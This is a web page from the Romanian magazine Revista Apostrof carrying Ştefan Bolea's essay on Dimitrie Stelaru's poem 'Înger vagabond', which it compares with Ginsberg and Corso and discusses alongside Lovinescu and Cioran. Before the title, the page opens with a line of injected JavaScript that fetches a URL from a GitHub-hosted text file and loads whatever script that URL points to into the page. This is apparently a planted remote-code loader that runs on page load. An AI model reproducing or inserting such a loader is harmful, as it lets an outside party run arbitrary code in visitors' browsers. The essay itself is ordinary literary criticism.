;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Revista Apostrof | ŞTEFAN BOLEA: PÂNĂ CÂND?
 

ŞTEFAN BOLEA: PÂNĂ CÂND?

Mircea Moţ aduce în atenţia noastră un splendid poet uitat în colecţia O sută şi una de poezii de la editura Academiei (2020): pe Dimitrie Stelaru, autorul electrizantului Înger vagabond, publicat în 1942 în volumul Noaptea geniului. Deşi au trecut aproape 80 de ani de la apariţia sa, Înger vagabond este un poem viu, prefigurând manifestele contra-culturale ale generaţiei Beat: „Noi, Dimitrie Stelaru, n-am cunoscut niciodată Fericirea,/ Noi n-am avut alt soare decât Umilinţa;/ Dar până când, înger vagabond, până când/ Trupul acesta gol şi flămând?/ Ne-am răsturnat oasele pe lespezile bisericilor,/ Prin păduri, la marginea oraşelor ­–/ Nimeni nu ne-a primit niciodată,/ Nimeni, nimeni…/ Cu fiecare îndărătnicie murim/ Şi rana mâinilor caută pâinea aruncată.// […] Odată – poate cu înfriguratele zori vom sângera/ Şi spânzurătorile ne vor ridica la cer.// Dar lasă, Dimitrie Stelaru, mai lasă!/ Într-o zi vom avea şi noi sărbătoare –/ Vom avea pâine, pâine/ Şi-un kilogram de izmă pe masă.//“ Poemul lui Stelaru mă trimite la versurile „Carl Solomon! I’m with you in Rockland/ where you’re madder than I am/“ din Howl (1955-56) de Ginsberg sau la „Alas, Jack, seems I cannot requiem thee without/ requieming America…/“ din Elegiac Feelings American (1970) de Gregory Corso. Poleiala post-romantică a textului nu poate deturna mesajul de stânga: Înger vagabond se referă la mizerie, excluziune şi la foame. Iar felul în care poetul se introduce ca personaj este mai şocant decât cel al manifestelor Beat, unde Carl Solomon şi Jack Kerouac funcţionau ca măşti auctoriale. Această combinaţie de megalomanie şi umilinţă absolută este reţeta fisiunii nucleare. Nu putem fi de acord cu E. Lovinescu, prefaţatorul Orei fantastice din 1944, care încearcă să-l deturneze pe Stelaru către sublimul estetismului. Acesta scria: „Nu adaug epitete; e poet nou, nu prin categoria socială, pe care unii vor să o reprezinte, de poet al mizeriei, al nedreptăţii, al decăderii; alcoolul, taverna, spiritul protestatar, reminiscenţele din Villon şi Rimbaud nu ne interesează, ci, dimpotrivă, înălţarea spirituală, capacitatea de expresie lapidară, dar eliptică, cu treptele logicii; rupte pe alocuri, înlocuite prin […] o stranie simplitate muzicală a versurilor de scurtă respiraţie, pure, fără noroiul vieţii (s.m.)“ (p. 133). Tocmai „noroiul vieţii“, sordid şi palpabil, prima materia a poeziei lui Stelaru şi a romanului său autobiografic, Zeii prind şoareci (1968), atrage atenţia asupra autenticităţii sale magnetice. În versul „Trupul acesta gol şi flămând“ concreteţea întrupării ne rupe de orice fantasme intelectualiste platoniciene, de schizofrenia celor care au impresia că trăiesc exclusiv în împărăţia ideilor. Iar faptul că „Nimeni nu ne-a primit niciodată“ este un apel la o vină colectivă neasumată, amintindu-ne că nici pe Fiul Omului nu l-am primit. Încheiem cu reflecţiile lui Cioran din Pe culmile disperării, în care acesta arată că specia umană este condamnată la autodistrugere, dacă se va manifesta exclusiv prin exploatare: „Cînd mă gîndesc la faptul că mizeria este strîns legată de existenţa omenească, nu mai pot adera la nici o teorie şi la nici o doctrină de reformă socială. Toate îmi par egal de stupide şi de inutile. Chiar şi tăcerea îmi pare un urlet. […] Fenomenul mizeriei apare numai la om, fiindcă numai el a putut să-şi creeze din semen un supus“.